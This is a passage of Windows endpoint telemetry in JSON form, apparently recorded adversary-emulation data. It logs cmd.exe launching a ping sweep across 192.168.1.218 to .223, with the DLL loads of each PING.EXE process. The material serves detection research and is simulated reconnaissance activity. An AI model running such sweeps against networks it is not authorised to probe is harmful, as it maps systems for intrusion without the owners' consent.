"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "process", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573056830000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.218", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3944, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573056970000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056830000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056830000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "process", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573061830000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.219", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4184, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4184, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "process", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573066990000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.220", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1376, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883573067130000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067300000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067300000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067300000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "process", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573071830000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.221", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6080, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "process", - 
"pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573076840000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.222", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6392, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573076980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - 
"unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "process", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573081830000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.223", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 764, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": 
"{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573081980000, - "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
